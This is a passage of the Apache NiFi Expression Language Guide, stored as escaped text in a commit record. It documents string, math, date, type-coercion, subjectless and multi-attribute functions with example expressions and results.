`true`\n|=======================================================================================\n\n\n\n\n[.function]\n=== indexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *first* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.indexOf Examples\n|===============================================\n| Expression | Value\n| `${filename:indexOf('a.*txt')}` | `-1`\n| `${filename:indexOf('.')}` | `20`\n| `${filename:indexOf('a')}` | `0`\n| `${filename:indexOf(' ')}` | `1`\n|===============================================\n\n\n\n\n[.function]\n=== lastIndexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *last* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n.lastIndexOf Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:lastIndexOf('a.*txt')}` | `-1`\n| `${filename:lastIndexOf('.')}` | `20`\n| `${filename:lastIndexOf('a')}` | `17`\n| `${filename:lastIndexOf(' ')}` | `11`\n|=======================================================================================\n\n\n[.function]\n=== jsonPath\n\n*Description*: [.description]#The `jsonPath` function generates a string by evaluating the Subject as JSON and applying a JSON\n path expression. An empty string is generated if the Subject does not contain valid JSON, the _jsonPath_ is invalid, or the path\n\tdoes not exist in the Subject. If the evaluation results in a scalar value, the string representation of scalar value is\n\tgenerated. Otherwise a string representation of the JSON result is generated. A JSON array of length 1 is special cased\n\twhen `[0]` is a scalar, the string representation of `[0]` is generated.^1^#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\t [.argName]#_jsonPath_# : [.argDesc]#the JSON path expression used to evaluate the Subject.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"myJson\" attribute is\n\n..........\n{\n \"firstName\": \"John\",\n \"lastName\": \"Smith\",\n \"isAlive\": true,\n \"age\": 25,\n \"address\": {\n \"streetAddress\": \"21 2nd Street\",\n \"city\": \"New York\",\n \"state\": \"NY\",\n \"postalCode\": \"10021-3100\"\n },\n \"phoneNumbers\": [\n {\n \"type\": \"home\",\n \"number\": \"212 555-1234\"\n },\n {\n \"type\": \"office\",\n \"number\": \"646 555-4567\"\n }\n ],\n \"children\": [],\n \"spouse\": null\n}\n..........\n\n.jsonPath Examples\n|===================================================================\n| Expression | Value\n| `${myJson:jsonPath('$.firstName')}` | `John`\n| `${myJson:jsonPath('$.address.postalCode')}` | `10021-3100`\n| `${myJson:jsonPath('$.phoneNumbers[?(@.type==\"home\")].number')}`^1^ | `212 555-1234`\n| `${myJson:jsonPath('$.phoneNumbers')}` | `[{\"type\":\"home\",\"number\":\"212 555-1234\"},{\"type\":\"office\",\"number\":\"646 555-4567\"}]`\n| `${myJson:jsonPath('$.missing-path')}` | _empty_\n| `${myJson:jsonPath('$.bad-json-path..')}` | _exception bulletin_\n|===================================================================\n\nAn empty subject value or a subject value with an invalid JSON document results in an exception bulletin.\n\n[[numbers]]\n== Mathematical Operations and Numeric Manipulation\n\nFor those functions that support Decimal and Number (whole number) types, the return value type depends on the input types. If either the\nsubject or argument are a Decimal then the result will be a Decimal. If both values are Numbers then the result will be a Number. This includes\nDivide. This is to preserve backwards compatibility and to not force rounding errors.\n\n\n[.function]\n=== plus\n\n*Description*: [.description]#Adds a numeric value to the Subject. If either the argument or the Subject cannot be\n\tcoerced into a Number, returns `null`.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to add to the Subject#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:plus(1000)}`\n\twill return the value `1100`.\n\n\n\n\n\n[.function]\n=== minus\n\n*Description*: [.description]#Subtracts a numeric value from the Subject.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to subtract from the Subject#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:minus(100)}`\n\twill return the value `0`.\n\n\n\n\n\n[.function]\n=== multiply\n\n*Description*: [.description]#Multiplies a numeric value by the Subject and returns the product.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to multiple the Subject by#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:multiply(1024)}`\n\twill return the value `102400`.\n\n\n\n\n[.function]\n=== divide\n\n*Description*: [.description]#Divides the Subject by a numeric value and returns the result.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:divide(12)}`\n\twill return the value `8`.\n\n\n\n\n[.function]\n=== mod\n\n*Description*: [.description]#Performs a modular division of the Subject by the argument. That is, this function will divide\n\tthe Subject by the value of the argument and return not the quotient but rather the remainder.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:mod(12)}`\n\twill return the value `4`.\n\n\n\n\n\n[.function]\n=== toRadix\n\n*Description*: [.description]#Converts the Subject from a Base 10 number to a different Radix (or number base). An optional second argument can be used to indicate the minimum number of characters to be used. If the converted value has fewer than this number of characters, the number will be padded with leading zeroes. If a decimal is passed as the subject, it will first be converted to a whole number and then processed.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Desired Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#\n\t- [.argName]#_Padding_# : [.argDesc]#Optional argument that specifies the minimum number of characters in the converted output#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"fileSize\" attributes has a value of 1024, then the following Expressions will yield\n\tthe following results:\n\n\n.toRadix Examples\n|=======================================================================================\n| Expression | Value\n| `${fileSize:toRadix(10)}` | `1024`\n| `${fileSize:toRadix(10, 1)}` | `1024`\n| `${fileSize:toRadix(10, 8)}` | `00001024`\n| `${fileSize:toRadix(16)}` | `400`\n| `${fileSize:toRadix(16, 8)}` | `00000400`\n| `${fileSize:toRadix(2)}` | `10000000000`\n| `${fileSize:toRadix(2, 16)}` | `0000010000000000`\n|=======================================================================================\n\n[.function]\n=== fromRadix\n\n*Description*: [.description]#Converts the Subject from a specified Radix (or number base) to a base ten whole number. The subject will converted as is, without interpretation, and all characters must be valid for the base being converted from. For example converting \"0xFF\" from hex will not work due to \"x\" being a invalid hex character. If a decimal is passed as the subject, it will first be converted to a whole number and then processed.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Subject Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attributes has a value of 1234A, then the following Expressions will yield\n\tthe following results:\n\n\n.toRadix Examples\n|=======================================================================================\n| Expression | Value\n| `${fileSize:fromRadix(11)}` | `17720`\n| `${fileSize:fromRadix(16)}` | `74570`\n| `${fileSize:fromRadix(20)}` | `177290`\n|=======================================================================================\n\n[.function]\n=== random\n\n*Description*: [.description]#Returns a random whole number ( 0 to 2^63 - 1) using an insecure random number generator.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: `${random():mod(10):plus(1)}` returns random number between 1 and 10 inclusive.\n\n[.function]\n=== math\n\n*Description*: [.description]#ADVANCED FEATURE. This expression is designed to be used by advanced users only. It utilizes Java Reflection to run arbitrary java.lang.Math static methods. The exact API will depend on the version of Java you are running. The Java 8 API can be found here: link:https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Math.html[https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Math.html^]\n +\nIn order to run the correct method, the parameter types must be correct. The Expression Language \"Number\" (whole number) type is interpreted as a Java \"long\". The \"Decimal\" type is interpreted as a Java \"double\". Running the desired method may require calling \"toNumber()\" or \"toDecimal()\" in order to \"cast\" the value to the desired type. This also is important to remember when cascading \"math()\" calls since the return type depends on the method that was run.#\n\n*Subject Type*: [.subject .subjectless]#Subjectless, Number or Decimal (depending on the desired method to run)#\n\n*Arguments*:\n\n\t- [.argName]#_Method_# : [.argDesc]#The name of the Java Math method to run#\n\t- [.argName]#_Optional Argument_# : [.argDesc]#Optional argument that acts as the second parameter to the method.#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on method run)#\n\n*Examples*:\n\n\t- ${math(\"random\")} runs Math.random().\n\n\t- ${literal(2):toDecimal:math(\"pow\", 2.5)} runs Math.pow(2D,2.5D).\n\n\t- ${literal(64):toDouble():math(\"cbrt\"):toNumber():math(\"max\", 5)} runs Math.max((Double.valueOf(Math.cbrt(64D))).longValue(), 5L). Note that the toDecimal() is needed because \"cbrt\" takes a \"double\" as input and the \"64\" will get interpreted as a long. The \"toDecimal()\" call is necessary to correctly call the method. that the \"toNumber()\" call is necessary because \"cbrt\" returns a double and the \"max\" method is must have parameters of the same type and \"5\" is interpreted as a long.\n\n\t- ${literal(5.4):math(\"scalb\", 2)} runs Math.scalb(5.4, 2). This example is important because NiFi EL treats all whole numbers as \"longs\" and there is no concept of an \"int\". \"scalb\" takes a second parameter of an \"int\" and it is not overloaded to accept longs so it could not be run without special type handling. In the instance where the Java method cannot be found using parameters of type \"double\" and \"long\" the \"math()\" EL function will attempt to find a Java method with the same name but parameters of \"double\" and \"int\".\n\n\t- ${first:toDecimal():math(\"pow\", ${second:toDecimal()})} where attributes evaluate to \"first\" = 2.5 and \"second\" = 2. This example runs Math.pow(2.5D, 2D). The explicit calls to toDecimal() are important because of the dynamic nature of EL. When creating the flow, the user is unaware if the expression language values will be able to be interpreted as a whole number or not. In this example without the explicit calls \"toDecimal\" the \"math\" function would attempt to run a Java method \"pow\" with types \"double\" and \"long\" (which doesn't exist).\n\n[[dates]]\n== Date Manipulation\n\n\n\n[[format]]\n[.function]\n=== format\n\n*Description*: [.description]#Formats a number as a date\/time according to the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat format. The Subject is expected to be a Number that\n\trepresents the number of milliseconds since Midnight GMT on January 1, 1970. The number will be evaluated using the local\n\ttime zone unless specified in the second optional argument.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_format_# : [.argDesc]#The format to use in the Java SimpleDateFormat syntax#\n\t- [.argName]#_time zone_# : [.argDesc]#Optional argument that specifies the time zone to use (in the Java TimeZone syntax)#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"time\" has the value \"1420058163264\", then the following Expressions will yield\n\tthe following results:\n\n.format Examples\n|============================================================================\n| Expression | Value\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS\\'Z'\", \"GMT\")}` | `2014\/12\/31 20:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS\\'Z'\", \"America\/Los_Angeles\")}` | `2014\/12\/31 12:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS\\'Z'\", \"Asia\/Tokyo\")}` | `2015\/01\/01 05:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd\", \"GMT\")}` | `2014\/12\/31`\n| `${time:format(\"HH:mm:ss.SSS\\'Z'\", \"GMT\")}` | `20:36:03.264Z`\n| `${time:format(\"yyyy\", \"GMT\")}` | `2014`\n|============================================================================\n\n\n\n\n\n[.function]\n=== toDate\n\n*Description*: [.description]#Converts a String into a Date data type, based on the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat syntax. The Subject is expected to be a String that is formatted\n\taccording the argument. The date will be evaluated using the local time zone unless specified in the second optional argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t\t- [.argName]#_format_# : [.argDesc]#The current format to use when parsing the Subject, in the Java SimpleDateFormat syntax.#\n\t\t- [.argName]#_time zone_# : [.argDesc]#Optional argument that specifies the time zone to use when parsing the Subject, in the Java TimeZone syntax.#\n\n\n*Return Type*: [.returnType]#Date#\n\n*Examples*: If the attribute \"year\" has the value \"2014\" and the attribute \"time\" has the value \"2014\/12\/31 15:36:03.264Z\",\n\tthen the Expression `${year:toDate('yyyy', 'GMT')}` will return a Date data type with a value representing Midnight GMT on\n\tJanuary 1, 2014. The Expression `${time:toDate(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\", \"GMT\")}` will result in a Date data type for\n\t15:36:03.264 GMT on December 31, 2014.\n\nOften, this function is used in conjunction with the <<format>> function to change the format of a date\/time. For example,\nif the attribute \"date\" has the value \"12-24-2014\" and we want to change the format to \"2014\/12\/24\", we can do so by\nchaining together the two functions: `${date:toDate('MM-dd-yyyy'):format('yyyy\/MM\/dd')}`.\n\n\n\n\n[.function]\n=== now\n\n*Description*: [.description]#Returns the current date and time as a Date data type object.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Date#\n\n*Examples*: We can get the current date and time as a Date data type by using the `now` function: `${now()}`. As an example,\n\ton Wednesday December 31st 2014 at 36 minutes after 3pm and 36.123 seconds EST `${now()}` would be evaluated to be a\n\tDate type representing that time. Since whole Expression Language expressions can only return Strings it would formatted as\n\t`Wed Dec 31 15:36:03 EST 2014` when the expression completes.\n\nUtilizing the <<toNumber>> method, `now` can provide the current date and time as the number of milliseconds since\nMidnight GMT on January 1, 1970. For instance, if instead of executing `${now()}` in the previous example `${now():toNumber()}`\nwas run then it would output `1453843201123`. This method provides millisecond-level precision and provides the ability to\nmanipulate the value.\n\n.now Examples\n|==================================================================================================================\n| Expression | Value\n| `${now()}` | A Date type representing the current date and time to the nearest millisecond\n| `${now():toNumber()}` | The number of milliseconds since midnight GMT Jan 1, 1970 (`1453843201123`, for example)\n| `${now():toNumber():minus(86400000)` | A number presenting the time 24 hours ago\n| `${now():format('yyyy')}` | The current year\n| `${now():toNumber():minus(86400000):format('E')}` | The day of the week that was yesterday,\n\t\t\t\t\t\t\t\t\t\t\t\t\t as a 3-letter abbreviation (For example, `Wed`)\n|==================================================================================================================\n\n\n\n\n[[type_cast]]\n== Type Coercion\n\n[.function]\n=== toString\n\n*Description*: [.description]#Coerces the Subject into a String#\n\n*Subject Type*: [.subject]#Any type#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The Expression `${fileSize:toNumber():toString()}` converts the value of \"fileSize\" attribute to a number and\n\tback to a String.\n\n\n\n[.function]\n=== toNumber\n\n*Description*: [.description]#Coerces the Subject into a Number#\n\n*Subject Type*: [.subject]#String, Decimal, or Date#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: The Expression `${fileSize:toNumber()}` converts the attribute value of \"fileSize\" to a number.\n\n\n[.function]\n=== toDecimal\n\n*Description*: [.description]#Coerces the Subject into a Decimal#\n\n*Subject Type*: [.subject]#String, Whole Number or Date#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Decimal#\n\n*Examples*: The Expression `${fileSize:toDecimal()}` converts the attribute value of \"fileSize\" to a decimal.\n\n\n\n\n[[subjectless]]\n== Subjectless Functions\n\nWhile the majority of functions in the Expression Language are called by using the syntax\n`${attributeName:function()}`, there exist a few functions that are not expected to have subjects.\nIn this case, the attribute name is not present. For example, the IP address of the machine can\nbe obtained by using the Expression `${ip()}`. All of the functions in this section are to be called\nwithout a subject. Attempting to call a subjectless function and provide it a subject will result in\nan error when validating the function.\n\n\n[.function]\n=== ip\n\n*Description*: [.description]#Returns the IP address of the machine.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The IP address of the machine can be obtained by using the Expression `${ip()}`.\n\n\n\n\n\n[.function]\n=== hostname\n\n*Description*: [.description]#Returns the Hostname of the machine. An optional argument of type Boolean can be provided\n\tto specify whether or not the Fully Qualified Domain Name should be used. If `false`, or not specified,\n\tthe hostname will not be fully qualified. If the argument is `true` but the fully qualified hostname\n\tcannot be resolved, the simple hostname will be returned.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*:\n\n\t- [.argName]#_Fully Qualified_# : [.argDesc]#Optional parameter that specifies whether or not the hostname should be\n\t\tfully qualified. If not specified, defaults to false.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The fully qualified hostname of the machine can be obtained by using the Expression `${hostname(true)}`,\n\twhile the simple hostname can be obtained by using either `${hostname(false)}` or simply `${hostname()}`.\n\n\n\n\n\n[.function]\n=== UUID\n\n*Description*: [.description]#Returns a randomly generated UUID.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: ${UUID()} returns a value similar to de305d54-75b4-431b-adb2-eb6b9e546013\n\n\n\n\n\n[.function]\n=== nextInt\n\n*Description*: [.description]#Returns a one-up value (starting at 0) and increasing over the lifetime of the running instance of NiFi.\n\tThis value is not persisted across restarts and is not guaranteed to be unique across a cluster.\n\tThis value is considered \"one-up\" in that if called multiple times across the NiFi instance, the values will be sequential.\n\tHowever, this counter is shared across all NiFi components, so calling this function multiple times from one Processor will\n\tnot guarantee sequential values within the context of a particular Processor.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the previous value returned by `nextInt` was `5`, the Expression `${nextInt():divide(2)}` obtains the next available\n\tinteger (6) and divides the result by 2, returning a value of `3`.\n\n\n\n[.function]\n=== literal\n\n*Description*: [.description]#Returns its argument as a literal String value. This is useful in order to treat a string or a number\n\tat the beginning of an Expression as an actual value, rather than treating it as an attribute name. Additionally, it\n\tcan be used when the argument is an embedded Expression that we would then like to evaluate additional functions against.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to be treated as a literal string, number, or boolean value.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: `${literal(2):gt(1)}` returns `true`\n\n`${literal( ${allMatchingAttributes('a.*'):count()} ):gt(3)}` returns true if there are more than 3 attributes whose\nnames begin with the letter `a`.\n\n[.function]\n=== getStateValue\n\n*Description*: [.description]#Access a processor's state values by passing in the String key and getting the value back as a String. This\n is a special Expression Language function that only works with processors that explicitly allow EL to query state. Currently only UpdateAttribute\n does.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.String]#_Key_# : [.argDesc]#The key to use when accessing the state map.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: UpdateAttribute processor has stored the key \"count\" with value \"20\" in state. '${getStateValue(\"count\")}` returns `20`.\n\n\n\n[.function]\n=== thread\n\n*Description*: [.description]#Returns the name of the thread used by the processor when evaluating the Expression. This can be useful\n when using a processor with multiple concurrent tasks and where some data uniqueness is required.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: `${thread()}` could return something like `Timer-Driven Process Thread-4`.\n\n\n\n[[multi]]\n== Evaluating Multiple Attributes\n\nWhen it becomes necessary to evaluate the same conditions against multiple attributes, this can be accomplished by means of the\n`and` and `or` functions. However, this quickly becomes tedious, error-prone, and difficult to maintain. For this reason, NiFi\nprovides several functions for evaluating the same conditions against groups of attributes at the same time.\n\n\n\n\n[.function]\n=== anyAttribute\n\n*Description*: [.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyAttribute Examples\n|=======================================================================\n| Expression | Value\n| `${anyAttribute(\"abc\", \"xyz\"):contains(\"bye\")}` | `true`\n| `${anyAttribute(\"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=======================================================================\n\n\n\n\n[.function]\n=== allAttributes\n\n*Description*: [.description]#Checks to see if all of the given attributes match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.allAttributes Example\n|=============================================================================\n| Expression | Value\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\")}` | `true`\n| `${allAttributes(\"abc\", \"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=============================================================================\n\n\n\n\n\n[.function]\n=== anyMatchingAttribute\n\n*Description*: [.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyMatchingAttribute Example\n|==============================================================\n| Expression | Value\n| `${anyMatchingAttribute(\"[ax].*\"):contains('bye')}` | `true`\n| `${anyMatchingAttribute(\".*\"):isNull()}` | `false`\n|==============================================================\n\n\n\n\n\n[.function]\n=== allMatchingAttributes\n\n*Description*: [.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyMatchingAttributes Examples\n|==============================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):contains(\"world\")}` | `true`\n| `${allMatchingAttributes(\".*\"):isNull()}` | `false`\n| `${allMatchingAttributes(\"f.*\"):count()}` | `1`\n|==============================================================\n\n\n\n\n\n[.function]\n=== anyDelineatedValue\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against any of the individual values, returns `true`, this\n\tfunction returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally an embedded Expression,\n\t\tthough it does not have to be.#\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"the,and,or,not\",\n\tconsider the following examples:\n\n.anyDelineatedValue Examples\n|===============================================================================\n| Expression | Value\n| `${anyDelineatedValue(\"${number_list}\", \",\"):contains(\"5\")}` | `true`\n| `${anyDelineatedValue(\"this that and\", \",\"):equals(\"${word_list}\")}` | `false`\n|===============================================================================\n\n\n\n[.function]\n=== allDelineatedValues\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against all of the individual values, returns `true` in each\n\tcase, then this function returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally\n\t\tan embedded Expression, though it does not have to be.#\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"those,known,or,not\",\n\tconsider the following examples:\n\n.allDelineatedValues Examples\n|===============================================================================\n| Expression | Value\n| `${allDelineatedValues(\"${word_list}\", \",\"):contains(\"o\")}` | `true`\n| `${allDelineatedValues(\"${number_list}\", \",\"):count()}` | `4`\n| `${allDelineatedValues(\"${number_list}\", \",\"):matches(\"[0-9]+\")}` | `true`\n| `${allDelineatedValues(\"${word_list}\", \",\"):matches('e')}` | `false`\n|===============================================================================\n\n\n\n\n[.function]\n=== join\n\n*Description*: [.description]#Aggregate function that concatenates multiple values with the specified delimiter. This function\n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The String delimiter to use when joining values#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.join Examples\n|=======================================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):join(\"-\")}` | `hello-good`\n| `${allAttributes(\"abc\", \"xyz\"):join(\" now\")}` | `hello world nowgood bye world now`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== count\n\n*Description*: [.description]#Aggregate function that counts the number of non-null, non-false values returned by the\n\t`allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`. This function\n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\",\n\tand \"number_list\" contains \"1,2,3,4,5\" consider the following examples:\n\n.count Examples\n|===========================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):count()}` | `2`\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\"):count()}` | `1`\n| `${allDelineatedValues(${number_list}, \",\"):count()}` | `5`\n| `${allAttributes(\"abc\", \"non-existent-attr\", \"xyz\"):count()}` | `2`\n| `${allMatchingAttributes(\".*\"):length():gt(10):count()}` | `2`\n|===========================================================================\n","old_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one or more\n\/\/ contributor license agreements. See the NOTICE file distributed with\n\/\/ this work for additional information regarding copyright ownership.\n\/\/ The ASF licenses this file to You under the Apache License, Version 2.0\n\/\/ (the \"License\"); you may not use this file except in compliance with\n\/\/ the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n= Apache NiFi Expression Language Guide\nApache NiFi Team <dev@nifi.apache.org>\n:homepage: 